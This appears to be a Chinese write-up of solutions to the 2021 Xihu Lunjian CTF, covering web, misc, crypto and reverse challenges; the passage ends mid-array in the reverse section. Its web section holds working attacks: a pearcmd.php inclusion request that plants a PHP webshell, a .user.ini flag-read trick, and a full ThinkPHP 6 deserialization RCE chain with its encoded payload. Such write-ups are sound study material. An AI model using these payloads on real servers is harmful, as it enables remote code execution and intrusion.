2021西湖论剑网络安全大赛部分WP
2024-06-09 19:23:08
2021西湖论剑网络安全大赛
公众号:Th0r安全
文章目录
- 2021西湖论剑网络安全大赛
- WEB
- OA?RCE?
- EZupload
- 灏妹的web
- EasyTp
- MISC
- 真·签到
- YUSA的小秘密
- Yusa的秘密
- CRYPTO
- unknown_dsa
- hardrsa
- 密码人集合
- REVERSE
- TacticalArmed
- ROR
- 虚假的粉丝
- PWN
- string _go
- blind
- code_project
WEB
OA?RCE?
题目的源码给了,但是还是倾向于先黑盒了解下大致的功能和路由。
可能存在路径穿越。看下大致的请求包。
应该是一个MVC的写法,这种审计控制器就行了。那个getshtml看着很有意思,对看着像base64的 参数解码试试
对应的是一个php文件
跟进看一下,发现确实会拼接上.php
同时也一样存在目录穿越,这里有了个任意php后缀文件包含。稍微审计了一下控制器,发现有个
phpinfoAction的,会显示phpinfo。看一下phpinfo
发现是之前挺火的一个trick,通过register_argc_argv对pearcmd.php进行本地文件包含。那就拿 之前看到的poc打一下吧。先fuzz一个可写的目录
看起来就像是个可写目录,先试着打一下吧
?+configcreate+/&m=index&a=getshtml&surl=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdXNyL2xvY2Fs
L2xpYi9waHAvcGVhcmNtZA&/<?=eval($_POST[111])?
>+/var/www/html/webmain/flow/page/123.php
确实可写,注意下用burp来打,浏览器会把<>url编码,写入后直接访问,system(‘ls /’); 发现存在
readflag,运行后返回flag
没有disable_functions还是挺友善的
DASCTF{6428b928d28d0733767691a9227468ad}
EZupload
html源码注释着提示<!–/?source=1–!>访问可以看到源代码 用了Latte模板渲染引擎,还有个文件上传点,上传文件名不能包含p,h且内容不能有< 可以上传.user.ini
auto_prepend_file=/flag
但是得访问一个php文件触发,Latte模板渲染引擎会在TempDirectory生成缓存文件,题目设置的 就是上传目录,只需要找到缓存文件名就行了
简单审计一下,生成规则为:
public function getCacheFile(string $name): string
{$hash = substr($this->getTemplateClass($name), 8);
$base = preg_match('#([/\\\\][\w@.-]{3,35}){1,3}$#D', $name, $m)
? preg_replace('#[^\w@.-]+#', '-', substr($m[0], 1)) . '--'
: '';
return "$this->tempDirectory/$base$hash.php";
}
public function getTemplateClass(string $name): string
{$key = serialize([$this->getLoader()->getUniqueId($name),
self::VERSION, array_keys((array) $this->functions), $this->sandboxed]);
return 'Template' . substr(md5($key), 0, 10);
}
先下载源码然后服务器上跑一遍, 输出$key
a:4:{i:0;s:18:"tempdir/test.latte";i:1;s:6:"2.10.4";i:2;a:7:
{i:0;s:5:"clamp";i:1;s:11:"divisibleBy";i:2;s:4:"even";i:3;s:5:"first";i:4;s:
4:"last";i:5;s:3:"odd";i:6;s:5:"slice";}i:3;b:1;}
文件名
然后爆破一下版本
import requests
import hashlib
def MD5(s):
return hashlib.md5(s.encode('utf-8')).hexdigest()
url = 'http://b332fcee-8ddb-4218-8316-807646a89ee8.ezupload- ctf.dasctf.com:2333/tempdir'
s =['2.9.4','2.8.6','2.7.4','2.6.4','2.5.7','2.10.5','2.10.4','2.9.3','2.7.3','
2.6.3']
for i in s:
a ='a:4:{i:0;s:18:"tempdir/test.latte";i:1;s:6:"'+i+'";i:2;a:7:
{i:0;s:5:"clamp";i:1;s:11:"divisibleBy";i:2;s:4:"even";i:3;s:5:"first";i:4;s
:4:"last";i:5;s:3:"odd";i:6;s:5:"slice";}i:3;b:1;}'
b =MD5(a)
c=f'/index.latte--{b[0:10]}.php'
print(c)
url1 = url+c
res = requests.get(url1)
print(res)
最后找到文件名:index.latte–6f26bb0dba.php
然后访问得到flag
灏妹的web
字典跑起来,扫扫扫扫扫扫出了 /.DS_Store :
稍微翻一下看看有什么文件的泄露,首先看到了.idea,说明.idea文件夹没删。然后看了一会还是看
不出来东西,去网上找了个/.DS_Store泄露的工具dumpall.py,跑出来跑了个 /.idea/dataSources ,
但是403,查一下就知道这文件应该还少个.xml后缀,加上访问就得到flag。
DASCTF{356015a82fb5f170532d412a74fa2329}
EasyTp
访问public提示no file parameter,然后传参?file=index.php提示file_exists() return true… hacker!!! ,传不存在的文件提示file_exists() return false…
猜测绕过file_exists函数就可以读源码,直接用伪协议读取index.php ? file=php://filter/convert.base64-encode/resource=index.php
然后得到源码
<?php
namespace app\controller;
use app\BaseController;
class Index extends BaseController
{public function index()
{//return '<style type="text[表情]s">*{ padding: 0; margin: 0; } div{padding: 4px 48px;} a{color:#2E5CD5;cursor: pointer;text-decoration: none}
a:hover{text-decoration:underline; } body{ background: #fff; font-family:
"Century Gothic","Microsoft yahei"; color: #333;font-size:18px;} h1{ fontsize: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height:
1.6em; font-size: 42px }</甩头yle><div style="padding: 24px 48px;"> <h1>:)
</h1><p> ThinkPHP V6<br/><span style="font-size:30px">13载初心不改 - 你值得信赖
的PHP框架</span></p></div><script type="text/javascript"
src="https://tajs.qq.com/stats?sId=64890268" charset="UTF-8"></script>
<script type="text/javascript"
src="https://e.topthink.com/Public/static/client.js"></script><think
id="eab4b9f840753f8e7"></think>';
if (isset($_GET['file'])) {
$file = $_GET['file'];
$file = trim($file);
$file = preg_replace('/\s+/','',$file);
if(preg_match("/flag/i",$file)){ die('<h2> no flag..');}
if(file_exists($file)){
echo "file_exists() return true..</br>";
die( "hacker!!!");
}else {
echo "file_exists() return false..";
@highlight_file($file);
}
} else {
echo "Error! no file parameter <br/>";
echo "highlight_file Error";
}
}
public function unser(){
if(isset($_GET['vulvul'])){
$ser = $_GET['vulvul'];
$vul = parse_url($_SERVER['REQUEST_URI']);
parse_str($vul['query'],$query);
foreach($query as $value)
{
if(preg_match("/O/i",$value))
{
die('</br> <h1>Hacking?');
exit();
}
}
unserialize($ser);
}
}
}
给了反序列化入口,但是要绕过waf,用///可绕过parse_url,payload:
///public/index.php/index/unser?vulvul=
然后传入一个tp6的rce链子就ok
<?php
namespace think\model\concern{trait Attribute{private $data = [7];
}
}
namespace think\view\driver{class Php{}
}
namespace think{abstract class Model{use model\concern\Attribute;
private $lazySave;
protected $withEvent;
protected $table;
function __construct($cmd){$this->lazySave = true;
$this->withEvent = false;
$this->table = new route\Url(new Middleware,new Validate,$cmd);
}
}
class Middleware{public $request = 2333;
}
class Validate{protected $type;
function __construct(){$this->type = [
"getDomainBind" => [new view\driver\Php,'display']
];
}
}
}
namespace think\model{use think\Model;
class Pivot extends Model{}
}
namespace think\route{class Url
{protected $url = 'a:';
protected $domain;
protected $app;
protected $route;
function __construct($app,$route,$cmd){$this->domain = $cmd;
$this->app = $app;
$this->route = $route;
}
}
}
namespace{echo urlencode(serialize(new think\Model\Pivot('<?php system("cat
/flag"); exit(); ?>')));
}
//O%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A21%3A%22%00think%5CModel
%00lazySave%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3
A%22%00%2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A
%22%00%2A%00url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%
3A37%3A%22%3C%3Fphp+system%28%22cat+%2Fflag%22%29%3B+exit%28%29%3B+%3F%3E%22
%3Bs%3A6%3A%22%00%2A%00app%22%3BO%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs
%3A7%3A%22request%22%3Bi%3A2333%3B%7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A14%3
A%22think%5CValidate%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00type%22%3Ba%3A1%3A%7Bs%
3A13%3A%22getDomainBind%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A21%3A%22think%5Cview%5Cd
river%5CPhp%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22display%22%3B%7D%7D%7D%7Ds%3A1
7%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bi%3A0%3Bi%3A7%3B%7D%7D
MISC
真·签到
扫码进入西湖论剑网络安全大赛微信公众号,发送语音说出“西湖论剑2021,我来了。”即可获得本 题 flag:
YUSA的小秘密
拿到这张图片,看到了
果断拿出了lsb专用小工具Stegsolve
日常翻页,翻到了下面这个,看到了隐约的flag,但是吧,这个flag不清晰,就想起来2020bytectf
的misc3,附链接https://bytectf.feishu.cn/docs/doccnqzpGCWH1hkDf5ljGdjOJYg#
百度搜索rgb ycbcr 颜色区别
https://www.baidu.com/s?ie=utf8&f=8&rsv_bp=1&tn=baidu&wd=rgb%20ycbcr%20%E9%A2%9C%E8%89%B2%E5%8C%BA%E5%88
%AB
尝试用字节官方writeup提到的方式进行YUV、YCbCr转换。
from cv2 import *
i=imread('yusa.png')
c=cv2.cvtColor(img, cv2.COLOR_BGR2YUV)
r,g,b = cv2.split(cv_color)
imwrite('yusa-yuv.png', (r % 2) * 255)
c=cv2.cvtColor(img, cv2.COLOR_BGR2YCrCb)
r,g,b = cv2.split(cv_color)
imwrite('yusa-ycc.png', (r % 2) * 255)
打开图片发现可以提取出flag: 2947b683036d49e5681f83f7bc3fbb34 。
Yusa的秘密
使用volatility工具进行内存取证,发现profile为 Win2008R2SP0x64 可以正常提取数据。
使用 iehistory 插件导出浏览器记录,发现Yusa用户在访问关键字为 contact、
Windows%20Workflow%20Foundation/key.zip 的文件。
$ grep zip filescan 0x000000003f3356f0 1 0 R--rw-
\Device\HarddiskVolume2\PROGRA~1\MSBuild\MICROS~1\WINDOW~1\key.zip$ grep Foundation zfilescan
Volatility Foundation Volatility Framework 2.6.1 0x000000003e58ada0 1 0 R--r-- \Device\HarddiskVolume2\Program
Files\MSBuild\Microsoft\Windows Workflow Foundation\Sakura-didi
0x000000003e7ab430 2 1 R--rwd \Device\HarddiskVolume2\Program Files\MSBuild\Microsoft\Windows Workflow Foundation
0x000000003f98f900 2 1 R--rwd \Device\HarddiskVolume2\Program Files\MSBuild\Microsoft\Windows Workflow Foundation$ grep contact filescan
0x000000003e748f20 1 0 R--r-d \Device\HarddiskVolume2\Users\Yusa\Contacts\Yusa.contact
0x000000003fa09070 1 0 R--r-d \Device\HarddiskVolume2\Users\Yusa\Contacts\Mystery Man.contact
使用 dumpfiles插件导出上面的文件。
从Mystery Man.contact中发现隐藏了一串只有大写字母,和2-7数字的字符串,猜测是base32,然 后解码。
LF2XGYPPXSGOPO4E465YPZMITLSYRGXGWS7OJOEL42O2LZFYQDSLRKXEXO56LCVB566IZ2FPW7S3
7K7HQK46LLUM42EJB354RTSL3IHFR6VONHEJ4S4ITZNEVHTJPNXJS62OHAECGZGCWWRVOBUXMN
KMGJTTKTDZME2TKU3PGVMWS5ZVGVYUKYJSKY2TON3ZJU2VSK3WGVGHK3BVGVJW6NLBGZCDK3
3NKQ2WE6KBGU3XKRJVG52UQNJXOVNDKTBSM42TK4KFGVRGK3BVLFLTGNBUINBTKYTFNQ2VSVZ
TGVNEOOJVLJBU4NKMGZSDKNCXNY2UY4KHGVGHSZZVG52WMNSLMVCTKWLJLI2DIQ2DMEZFMNJ
XG54WCT2EJF3VSV2NGVGW2SJVLJVFKNCNKRIXSWLNJJUVS6SJGNMTERLZJ5KFM3KNK5HG2TSEM46
Q====
% echo
LF2XGYPPXSGOPO4E465YPZMITLSYRGXGWS7OJOEL42O2LZFYQDSLRKXEXO56LCVB566IZ2FPW7S3
7K7HQK46LLUM42EJB354RTSL3IHFR6VONHEJ4S4ITZNEVHTJPNXJS62OHAECGZGCWWRVOBUXMN
KMGJTTKTDZME2TKU3PGVMWS5ZVGVYUKYJSKY2TON3ZJU2VSK3WGVGHK3BVGVJW6NLBGZCDK3
3NKQ2WE6KBGU3XKRJVG52UQNJXOVNDKTBSM42TK4KFGVRGK3BVLFLTGNBUINBTKYTFNQ2VSVZ
TGVNEOOJVLJBU4NKMGZSDKNCXNY2UY4KHGVGHSZZVG52WMNSLMVCTKWLJLI2DIQ2DMEZFMNJ
XG54WCT2EJF3VSV2NGVGW2SJVLJVFKNCNKRIXSWLNJJUVS6SJGNMTERLZJ5KFM3KNK5HG2TSEM46
Q====|base32 -d
Yusa,组织刚刚派下来一个任务,请快点完成,你只有三天时间。
6L+Z5piv5L2g5Lya55So5Yiw55qEa2V577yM5Y+v5Lul55So5a6D5omT5byA57uE57uH57uZ5L2g55q
E5bel5YW344CC5bel5YW35ZG95ZCN5L6d54Wn5LqG5Lyg57uf6KeE5YiZ44CCa2V577yaODIwYWM5
MmI5ZjU4MTQyYmJiYzI3Y2EyOTVmMWNmNDg=
猜测是base64,继续解码。
% echo
6L+Z5piv5L2g5Lya55So5Yiw55qEa2V577yM5Y+v5Lul55So5a6D5omT5byA57uE57uH57uZ5L2g55q
E5bel5YW344CC5bel5YW35ZG95ZCN5L6d54Wn5LqG5Lyg57uf6KeE5YiZ44CCa2V577yaODIwYWM5
MmI5ZjU4MTQyYmJiYzI3Y2EyOTVmMWNmNDg=|base64 -d
这是你会用到的key,可以用它打开组织给你的工具。工具命名依照了传统规则。key:
820ac92b9f58142bbbc27ca295f1cf48
发现导出的cmdline有便签程序
$ grep StikyNot cmdline
StikyNot.exe pid: 2228
Command line : “C:\Windows\system32\StikyNot.exe”
然后memdump -p 2228 -D .
$ mv 2228.dmp 2228.data
通过gimp导入 2228.data的内存文件后,不断尝试调整 位移、宽度,发现宽度2260、位移约5577
万时能看到较清晰图像。
密码为:世界没了心跳 。
file 检测发现 Sakura-didi 是zip文件。
Sakura-didi
Length Date Time Name
1254 2021-10-28 19:14 key.bmp
key.zip
Length Date Time Name
453 2021-10-28 22:53 exp
使用之前找到的密码解压
key.zip 世界没了心跳
Sakura-didi.zip 820ac92b9f58142bbbc27ca295f1cf48
$file key.bmp
/Users/ro0t/Downloads/Yusa的秘密/key.bmp: PC bitmap, Windows 3.x format, 20 x 20 x 24
strings Yusa-PC.raw 后发现多个 YusaYusa关键字,和用户名Yusa匹配,尝试进行 YusaYusa*爆
破,发现YusaYusa520 为
Who_am_I.zip 的密码。
发现exp的python脚本 对key.bmp使用flag进行了加密处理。
编写解密脚本如下:
from PIL import Image
import struct
pic = Image.open('key.bmp')
fp = open('Who_am_I1', 'rb')
#fp = open('flag', 'rb')
fs = open('flag1', 'wb')
#fs = open('Who_am_I', 'wb')
a, b = pic.size
print(a,b)
list1 = []
for y in range(b):
for x in range(a):
pixel = pic.getpixel((x, y))
list1.extend([pixel[1], pixel[0], pixel[2], pixel[2], pixel[1], pixel[0]])
data = fp.read()
for i in range(0, len(data)):
fs.write(struct.pack('B', data[i] ^ list1[i % ab6]))
fp.close()
fs.close()
然后执行生成 flag1文件,file发现是 gif图片。
gif导出为静态图片后,发现一张flag 图片,为 c3837c61-77f1-413e-b2e6-3ccbc96df9f4
CRYPTO
unknown_dsa
题目涉及pell方程和DSA,解pell方程可得ul和vl
#sage
def pell(n):
cf = continued_fraction(sqrt(n))
for i in range(1000):
vl = cf.denominator(i)
ul = cf.numerator(i)
if ul**2 - n * vl**2 == 1:
return ul, vl
z = zip(ul, vl)
return z
ul = []
vl = []
wl, cl1, cl2 = [3912956711, 4013184893, 3260747771],
[285258922377992879626654060042167879088906728491168257892421618605259039359
5645322161563386615512475256726384365091711034449682791268994623758937752874
7509182009618889970824771008110257218987207836668686234982462196772211062276
60895519058631965055790709130207760704,
2111584990618013965631066460745842563767052008198324825898416602622289875350
5008904136688820075720411004158264138659762101873588583686473388951744733936
769732617279649797085152057880233721961,
3018991790921859647858477051669501812556772722943778230450112050353184634966
8278828965117763534189430853778744914819958349011705952697175980442697794795
2721266880757177055335088777693134693713345640206540670123872210178680306100
865355059146219281124303460105424],
[148052450029409767056623510365366602228778431569288407577131980435074529632
7150149711334526260212269446322824793123786673537921171334520699723341693868
3722728592401118703567187475890102871950516388778938283577066421804574346522
2788859258272826217869877607314144,
1643631850318055151946938381389671039738824953272816402371095118047179758846
7030709318502386682626254448265648334522948071105444415378301997520500406974
40948146092723713661125309994275256,
1094958701601679594044597619846014925814463536699645559860524474354072876463
5947061037779912661207322820180541114179612916018317600403816027703391110922
1123119109000344423403873040067615897089438143963031830858583569615372791631
75384848010568152485779372842]
for j in range(len(wl)):
l = pell(wl[j])
ul.append(l[0])
vl.append(l[1])
print(ul)
print(vl)
解完之后excrt解出m1和m2,接着就能解得hm1和hm2
之后通过p*q和(p-1)//q求得p和q
#sage
pq, p1q =
85198615386075607567070020969981777827671873654631200472078241980737834438897
90014624884027919113915641653710839968287437062988820733450623704001783831355
89112750739041484515402557058184775811828662694130182630798586802216473416807
62989080418039972704759003343616652475438155806858735982352930771244880990190
318526933267455248913782297991685041187565140859,
10623995021320631630168390754576391633605524395570621094473647242596520010346
14217818047316784301163337020997778552794691372191652937255008875902803559731
07580745212368937514070059991848948031718253804694621821734957604838125210951
711527151265000736896607029198
p = (sqrt(pq*p1q+1/4)+1/2)[0]
q = pq // p
print(p)
print(q)
后面就是常规DSA了,附完整的exp
from Crypto.Util.number import *
from Crypto.Hash import SHA
from functools import reduce
from gmpy2 import *
def exgcd(a, b):
if b == 0: return 1, 0
x, y = exgcd(b, a % b)
return y, x - a // b * y
def uni(P, Q):
r1, m1 = P
r2, m2 = Q
d = gcd(m1, m2)
assert (r2 - r1) % d == 0
l1, l2 = exgcd(m1 // d, m2 // d)
return (r1 + (r2 - r1) // d * l1 * m1) % lcm(m1, m2), lcm(m1, m2)
def CRT(eq):
return reduce(uni, eq)
ul =
[105371903839774328199486027174493138195130158104644633484506628604350110080
0113223885172926803288929660024822622108642003526254073215709794979175642102
6015741477785995033447663038515248071740991264311479066137102975721041822067
496462240009190564238288281272874966280,121723653124334943327337351369224143
3894286925361825866900529315481561774664373209647016095900048259813782943587
8144603239288618635142272817397523171992484110548099092717491317589797273253
2233,14401763248315625391836174251991173632444291143854372329652570393238732
5626989471622981748408863140707432849889671096671391285764256535030625249875
4145253802734893404773499918668829576304890397994277568525506501428687843547
083479356423917301477033624346211335450]
vl =
[168450500310972930707208583777353845862723614274337696968629340838437927919
3659737364314677378259318944035821331259175791966216971755728336717890751696
2183176839865490958427363614351994016564883885001294357868605762541542126632
1405275952938776845012046586285747,
1921455776649552079281304558665818887261070948261008212148121820969448652705
8558044234236818483416000848630785304015189312631508874092001017801916008026
01105030806253998955929263882382004,
2522069581689707591621709585663100901250412759005943639369210125041822609732
3331193222730091563032067314889286051745468263446649323295355350101318199942
9502235721940271891990460451560462952746399770525857683655016403400233567567
83359924935106074017605019787]
cl1 =
[285258922377992879626654060042167879088906728491168257892421618605259039359
5645322161563386615512475256726384365091711034449682791268994623758937752874
7509182009618889970824771008110257218987207836668686234982462196772211062276
60895519058631965055790709130207760704,2111584990618013965631066460745842563
7670520081983248258984166026222898753505008904136688820075720411004158264138
6597621018735885836864733889517447339367697326172796497970851520578802337219
61,3018991790921859647858477051669501812556772722943778230450112050353184634
9668278828965117763534189430853778744914819958349011705952697175980442697794
7952721266880757177055335088777693134693713345640206540670123872210178680306
100865355059146219281124303460105424]
cl2 =
[148052450029409767056623510365366602228778431569288407577131980435074529632
7150149711334526260212269446322824793123786673537921171334520699723341693868
3722728592401118703567187475890102871950516388778938283577066421804574346522
2788859258272826217869877607314144,
1643631850318055151946938381389671039738824953272816402371095118047179758846
7030709318502386682626254448265648334522948071105444415378301997520500406974
40948146092723713661125309994275256,
1094958701601679594044597619846014925814463536699645559860524474354072876463
5947061037779912661207322820180541114179612916018317600403816027703391110922
1123119109000344423403873040067615897089438143963031830858583569615372791631
75384848010568152485779372842]
m11, mod1 = CRT(zip(cl1, ul))
m1 = long_to_bytes(iroot(m11, 7)[0])
hm1 = bytes_to_long(SHA.new(m1).digest())
# print(hm1)
m22, mod2 = CRT(zip(cl2, vl))
m2 = long_to_bytes(iroot(m22, 7)[0])
hm2 = bytes_to_long(SHA.new(m2).digest())
# print(hm2)
pq, p1q, t =
8519861538607560756707002096998177782767187365463120047207824198073783443889
7900146248840279191139156416537108399682874370629888207334506237040017838313
5589112750739041484515402557058184775811828662694130182630798586802216473416
8076298908041803997270475900334361665247543815580685873598235293077124488099
0190318526933267455248913782297991685041187565140859,
1062399502132063163016839075457639163360552439557062109447364724259652001034
6142178180473167843011633370209977785527946913721916529372550088759028035597
3107580745212368937514070059991848948031718253804694621821734957604838125210
951711527151265000736896607029198,
6013217639592289690251884524405106541714350755051986021107796550178331597110
9433544482411208238485135554065241864956361676878220342500208011089383751225
4374170498937255461767994171888759726772936800330053998831135311937053534048
9214181149341507975545618585888980145638691089223986973280527387928109461332
9645326287205736614546311143635580051444446576104548
r1, s1, s2, r2, s3 = 498841194617327650445431051685964174399227739376,
376599166921876118994132185660203151983500670896,
187705159843973102963593151204361139335048329243,
620827881415493136309071302986914844220776856282,
674735360250004315267988424435741132047607535029
p =
9513935388077210493987061814544823425103110515340656583302978729904037839500
2190438381537974853777890692924407167823818980082672873538133127131356810153
0129240252708839661724206587779033375760271059541198114954111490929604220554
4512109725980268696028825839975418548430735030545478883770236397152308533507
4839
q = 895513916279543445314258868563331268261201605181
s = s1-s2
m = hm1-hm2
k = (m * invert(s, q)) % q
x1 = (s1*k - hm1)*invert(r1, q) % q
x2 = (s3*k - hm1)*invert(r2, q) % q
print(long_to_bytes(x1)+long_to_bytes(x2))
#DASCTF{f11bad18f529750fe52c56eed85d001b}
hardrsa
羊城杯原题,附exp
from Crypto.Util.number import *
import sympy
dp=
3794769731581465508310049527476439944399404356564837722690130815805325396401
8902002095879651422415083768036697774727229188128539191916707772683632656447
3
c =
5724825894592738767357946734810611874703438119070377786140952733627291455969
9490353325906672956273559867941402281438670652710909532261303394045079629146
1563408019322548390215741399439334519240628884267263532307572845828639932275
9270332313326518041438206213258052665820571621804636624765388176465889131559
2607194355733209493239611216193118424602510964102026998674323685134796018596
8173932681065837371535166329690416932807252979292777511360405468302305338985
1465971471721337161985313727251596706700880552105161310714155578851689422365
4851277785393355178114230929014037436770678131148140398384394716456450269539
0650093963119960404228537400495085005402814881712852334457447996800223071804
5221079391361413164687594969807991731357287307303380463987769988448929012030
2696697425
c1=
7810013146187228561342624432273750214721948510879913097520242963804285948813
6933783498210914335741940761656137516033926418975363734194661031678516857040
7235320554486959288206240944004814649501811266384562346698149824112709856502
0924568776559548373887697557252127696314954265918768007591732230851216390442
3297381635532771690434016589132876171283596320435623376283425228536157726781
5248703486149831164088150882576097885179868106225059615388128899531856842564
6954036980986310394832644409071516135119822916319013090366187463102030448184
2715086104243998808382859633753938512915886223513449238733721777977175430329
7179709404408620592045182241267928229121414792607912323125447483014126362224
9884167674220839062235302266832080920131272493686216735070982358187072283132
9406359010293121019764160016316259432749291142448874259446854582307626758650
1516077704783347193179417276809352438203131448298260819555397785705652329354
6320113511004986120443228506002923722951829729167911416526580886286282721119
3711159152992427133176177796045981572758903474465179346029811563765283254777
8134333398920583220132289641033049467438882130683976725408632608833146654920
8879355477567461099463953726358827607699290773515370200200100538332144297409
7626786699895993544581572457476437853778794888945238622869401634353220344790
4193265168361461407068525777483649033491382461063799546470025570911314756692
9599719648454819950733542149955698594913916263956062297328310934274618699460
9598854386966520638338999059
y =
4497033477092873289824468123188701582303696886258943079536040745024132580452
6550249636599838356211991556508051807736083970500405821178436965648667830700
7348691991136610142919372779782779111507129101110674559235388392082113417306
0020501242159048030268944001551942754248345779425001504104400576606794609186
4535737609561307972017214830209789373403478845812233381675916260588887953159
4217661921547293164281934920669935417080156833072528358511807757748554348615
9579776637847621247465546381526934695807610024377938370941013384080174072519
8611658924052362534096402553135744670626387184348914306862050102028442178124
3879675292060268876353250854369189182926055204229002568224846436918153245720
5144502344331707173110838685914771860618962827908808507974716583213241273347
0443843035484477013198004966851635077493962536990986990636217401562807825803
9638111064842324979997867746404806457329528690722757322373158670827203350590
8093909329866168055331687146868341749652112428632010764821271525717749605809
1531802230341811134640629521757156415557376537151974932592214587512839590911
2254242027512400564855444101325427710643212690768272048881411988830011985059
2180486843113494157644417603647629426927228348502879853995590424574709425804
5651639518863791630381405577735773889426403798894595146841686164720465889383
7753361851667573185920779272635885127149348845064478121843462789367112698673
7800054361443935738324982036590569092337572065375142909938106288722508418620
59672570704733990716282248839
g = 2
x = sympy.discrete_log(y, c1, g)
p = sympy.symbols("p")
a = sympy.solve([2019*p**2 + 2020*p**3 + 2021*p**4-x], [p])
#print(a)
p =
1213160116578802463503003492108407047005384211298486682107039528172846880507
2716002494427632757418621194662541766157553264889658892783635499016425528807
741
m = pow(c, dp, p)
print(long_to_bytes(m))
密码人集合
题目内容:A gift for u. enjoy it. XD
打开题目环境
ip: 82.157.25.233
port: 53900
protocol: tcp
发现直接打打不开,nc连接
请输入答案字符串: 最开始以为是西湖论剑我要拿第一,结果提示格式错误
最开始以为真的是输入字符格式不对,尝试过字母,数字之后都不行,最后想起来会不会是数独,
将汉字转化为数字进行数独在线解密:https://shudu.gwalker.cn/
解得:
2 4 1 3 6 9 5 8 7
3 6 5 8 7 1 2 9 4
7 8 9 5 2 4 6 1 3
8 7 4 2 9 6 1 3 5
9 5 3 1 8 7 4 6 2
1 2 6 4 5 3 8 7 9
5 3 7 6 4 8 9 2 1
6 9 2 7 1 5 3 4 8
4 1 8 9 3 2 7 5 6
解出为:湖剑西论要一我第拿论要我第拿西湖一剑拿第一我湖剑要西论第拿剑湖一要西论我一我论
西第拿剑要湖西湖要剑我论第拿一我论拿要剑第一湖西要一湖拿西我论剑第剑西第一论湖拿我要
恭喜!答案正确,这是你的奖DASCTF{a2fc1eaeb8487631fe3bade2a6682a77}。
继续开启下一站的旅程吧。 拿到flag:DASCTF{a2fc1eaeb8487631fe3bade2a6682a77}
提交:a2fc1eaeb8487631fe3bade2a6682a77
REVERSE
TacticalArmed
程序开始时有反调试,把int 2D patch成int 3之后就可以动调。
抛出异常后会初始化四个常量,调试可以得到4011F0函数处smc执行后的字节码。
反汇编可见 右移5左移4XOR 推测是TEA加密输入值后比较是否一致,写解密脚本:
#include <stdio.h>
#include <stdbool.h>
#include <iostream>
#include<stdio.h>
#include<stdint.h>
using namespace std;
void DecryptTEA(unsigned int* firstChunk, unsigned int* secondChunk,
unsigned int* key, int count) {unsigned int sum = 0;
unsigned int y = *firstChunk;
unsigned int z = *secondChunk;
unsigned int delta = -0x7E5A96D2; //smc第一段
sum = delta * 33 * (count+1);
for (int i = 0; i < 33; i++) //33轮
{z -= (y << 4) + key[2] ^ y + sum ^ (y >> 5) + key[3];
y -= (z << 4) + key[0] ^ z + sum ^ (z >> 5) + key[1];
sum -= delta;
}
*firstChunk = y;
*secondChunk = z;
}
int main(int argc, char const* argv[]) {unsigned int dword_405000[4];
dword_405000[0] = 0x7CE45630; //抛出异常时初始化的key数组
dword_405000[1] = 0x58334908; //原始key是fake key
dword_405000[2] = 0x66398867;
dword_405000[3] = 0xC35195B1;
unsigned int goal[] = {0x422F1DED,0x1485E472,0x035578D5,0xBF6B80A2,0x97D77245,0x2DAE75D1,0x665FA963
,0x292E6D74,0x9795FCC1,0x0BB5C8E9,0 }; //最后比较的数组
for (int i = 0; i < 5; i++) {DecryptTEA(&goal[i * 2 + 0], &goal[i * 2 + 1], dword_405000, i);
}
printf("%s\n", goal);
return 0;
}
输出即为flag
ROR
把判断处展开:
printf("%02x ",(unsigned __int8)(
(v6[j] & Str[i + 7]) << (8 - (7 - j) % 8u) |
(v6[j] & Str[i + 6]) << (8 - (6 - j) % 8u) |
(v6[j] & Str[i + 5]) << (8 - (5 - j) % 8u) |
(v6[j] & Str[i + 4]) << (8 - (4 - j) % 8u) |
(v6[j] & Str[i + 3]) << (8 - (3 - j) % 8u) |
(v6[j] & Str[i + 2]) << (8 - (2 - j) % 8u) |
(v6[j] & Str[i + 1]) << (8 - (1 - j) % 8u) |
(v6[j] & Str[i + 0]) << (8 - (0 - j) % 8u) |
(v6[j] & (unsigned int)Str[i + 7]) >> ((7 - j) % 8u) |
(v6[j] & (unsigned int)Str[i + 6]) >> ((6 - j) % 8u) |
(v6[j] & (unsigned int)Str[i + 5]) >> ((5 - j) % 8u) |
(v6[j] & (unsigned int)Str[i + 4]) >> ((4 - j) % 8u) |
(v6[j] & (unsigned int)Str[i + 3]) >> ((3 - j) % 8u) |
(v6[j] & (unsigned int)Str[i + 2]) >> ((2 - j) % 8u) |
(v6[j] & (unsigned int)Str[i + 1]) >> ((1 - j) % 8u) |
(v6[j] & (unsigned int)Str[i + 0]) >> ((0 - j) % 8u)
));
不难发现加密前每一位只对加密后两个位有影响,但是事实上有一半不会被执行
因为只有当(v6[j]&255)位移后大于0且小于128才会有影响.
因此加密前后的位有对应关系,写脚本还原:
#include <stdio.h>
#include <stdbool.h>
#include <iostream>
using namespace std;
int __cdecl main(int argc, const char** argv, const char** envp){char v4; // [esp+0h] [ebp-2C0h]
char v5; // [esp+8Fh] [ebp-231h]
int v6[9]; // [esp+94h] [ebp-22Ch]
int j; // [esp+B8h] [ebp-208h]
unsigned int i; // [esp+BCh] [ebp-204h]
char Str[80] = { 0 }; // [esp+1C0h] [ebp-100h] BYREF
char data[] = {0x65, 0x08, 0xF7, 0x12, 0xBC, 0xC3, 0xCF, 0xB8, 0x83, 0x7B,
0x02, 0xD5, 0x34, 0xBD, 0x9F, 0x33, 0x77, 0x76, 0xD4, 0xD7,
0xEB, 0x90, 0x89, 0x5E, 0x54, 0x01, 0x7D, 0xF4, 0x11, 0xFF,
0x99, 0x49, 0xAD, 0x57, 0x46, 0x67, 0x2A, 0x9D, 0x7F, 0xD2,
0xE1, 0x21, 0x8B, 0x1D, 0x5A, 0x91, 0x38, 0x94, 0xF9, 0x0C,
0x00, 0xCA, 0xE8, 0xCB, 0x5F, 0x19, 0xF6, 0xF0, 0x3C, 0xDE,
